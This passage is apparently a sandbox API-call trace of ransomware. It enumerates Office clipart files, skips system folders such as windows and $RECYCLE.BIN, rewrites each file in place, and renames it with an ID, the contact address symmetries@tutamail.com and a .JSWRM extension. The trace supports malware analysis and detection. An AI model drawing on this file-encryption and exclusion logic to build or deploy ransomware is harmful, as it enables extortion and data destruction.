lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e898*=0x4d0, lpOverlapped=0x0) returned 1 [0099.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0099.564] CloseHandle (hObject=0x314) returned 1 [0099.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0099.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0099.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0099.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0099.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0099.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0099.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0099.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0099.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0099.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0099.565] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01743_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01743_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01743_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01743_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0099.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0099.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0099.566] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x31f, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01744_.GIF", cAlternateFileName="")) returned 1 [0099.566] lstrcmpiW (lpString1="WB01744_.GIF", lpString2=".") returned 1 [0099.566] lstrcmpiW (lpString1="WB01744_.GIF", lpString2="..") returned 1 [0099.566] lstrcmpiW (lpString1="WB01744_.GIF", lpString2="...") returned 1 [0099.566] lstrcmpiW (lpString1="WB01744_.GIF", lpString2="windows") returned -1 [0099.566] lstrcmpiW (lpString1="WB01744_.GIF", lpString2="recovery") returned 1 [0099.566] lstrcmpiW (lpString1="WB01744_.GIF", lpString2="perflogs") returned 1 [0099.566] lstrcmpiW (lpString1="WB01744_.GIF", lpString2="documents and settings") returned 1 [0099.566] lstrcmpiW (lpString1="WB01744_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.566] lstrcmpiW (lpString1="WB01744_.GIF", lpString2="system volume information") returned 1 [0099.566] lstrcmpiW (lpString1="WB01744_.GIF", lpString2="msocache") returned 1 [0099.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0099.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01744_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01744_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01744_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0099.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0099.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01744_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01744_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01744_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0099.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0099.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0099.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0099.566] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01744_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01744_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.567] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=799) returned 1 [0099.567] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x310) returned 0x20b1f8 [0099.567] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x310, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x310, lpOverlapped=0x0) returned 1 [0099.568] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.568] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x310, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x310, lpOverlapped=0x0) returned 1 [0099.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0099.568] CloseHandle (hObject=0x314) returned 1 [0099.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0099.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0099.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0099.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0099.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0099.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0099.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0099.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0099.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0099.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0099.569] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01744_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01744_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01744_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01744_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0099.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0099.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0099.570] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10491364, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01745_.GIF", cAlternateFileName="")) returned 1 [0099.570] lstrcmpiW (lpString1="WB01745_.GIF", lpString2=".") returned 1 [0099.570] lstrcmpiW (lpString1="WB01745_.GIF", lpString2="..") returned 1 [0099.570] lstrcmpiW (lpString1="WB01745_.GIF", lpString2="...") returned 1 [0099.570] lstrcmpiW (lpString1="WB01745_.GIF", lpString2="windows") returned -1 [0099.570] lstrcmpiW (lpString1="WB01745_.GIF", lpString2="recovery") returned 1 [0099.570] lstrcmpiW (lpString1="WB01745_.GIF", lpString2="perflogs") returned 1 [0099.570] lstrcmpiW (lpString1="WB01745_.GIF", lpString2="documents and settings") returned 1 [0099.570] lstrcmpiW (lpString1="WB01745_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.570] lstrcmpiW (lpString1="WB01745_.GIF", lpString2="system volume information") returned 1 [0099.570] lstrcmpiW (lpString1="WB01745_.GIF", lpString2="msocache") returned 1 [0099.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0099.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01745_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01745_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01745_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0099.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0099.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01745_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01745_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01745_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0099.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0099.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0099.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0099.570] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01745_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01745_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.571] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1452) returned 1 [0099.571] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5a0) returned 0x2332c0 [0099.571] ReadFile (in: hFile=0x314, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x5a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x5a0, lpOverlapped=0x0) returned 1 [0099.619] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.619] WriteFile (in: hFile=0x314, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x5a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x5a0, lpOverlapped=0x0) returned 1 [0099.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0099.620] CloseHandle (hObject=0x314) returned 1 [0099.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0099.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0099.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0099.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0099.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0099.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0099.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0099.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0099.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0099.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0099.620] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01745_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01745_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01745_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01745_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0099.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0099.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0099.621] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01746_.GIF", cAlternateFileName="")) returned 1 [0099.621] lstrcmpiW (lpString1="WB01746_.GIF", lpString2=".") returned 1 [0099.621] lstrcmpiW (lpString1="WB01746_.GIF", lpString2="..") returned 1 [0099.621] lstrcmpiW (lpString1="WB01746_.GIF", lpString2="...") returned 1 [0099.622] lstrcmpiW (lpString1="WB01746_.GIF", lpString2="windows") returned -1 [0099.622] lstrcmpiW (lpString1="WB01746_.GIF", lpString2="recovery") returned 1 [0099.622] lstrcmpiW (lpString1="WB01746_.GIF", lpString2="perflogs") returned 1 [0099.622] lstrcmpiW (lpString1="WB01746_.GIF", lpString2="documents and settings") returned 1 [0099.622] lstrcmpiW (lpString1="WB01746_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.622] lstrcmpiW (lpString1="WB01746_.GIF", lpString2="system volume information") returned 1 [0099.622] lstrcmpiW (lpString1="WB01746_.GIF", lpString2="msocache") returned 1 [0099.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0099.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01746_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01746_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01746_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0099.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0099.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01746_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01746_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01746_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0099.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0099.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0099.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0099.622] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01746_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01746_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.623] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=738) returned 1 [0099.623] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2e0) returned 0x20b1f8 [0099.623] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x2e0, lpOverlapped=0x0) returned 1 [0099.624] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.624] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x2e0, lpOverlapped=0x0) returned 1 [0099.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0099.625] CloseHandle (hObject=0x314) returned 1 [0099.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0099.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0099.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0099.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0099.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0099.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0099.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0099.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0099.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0099.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 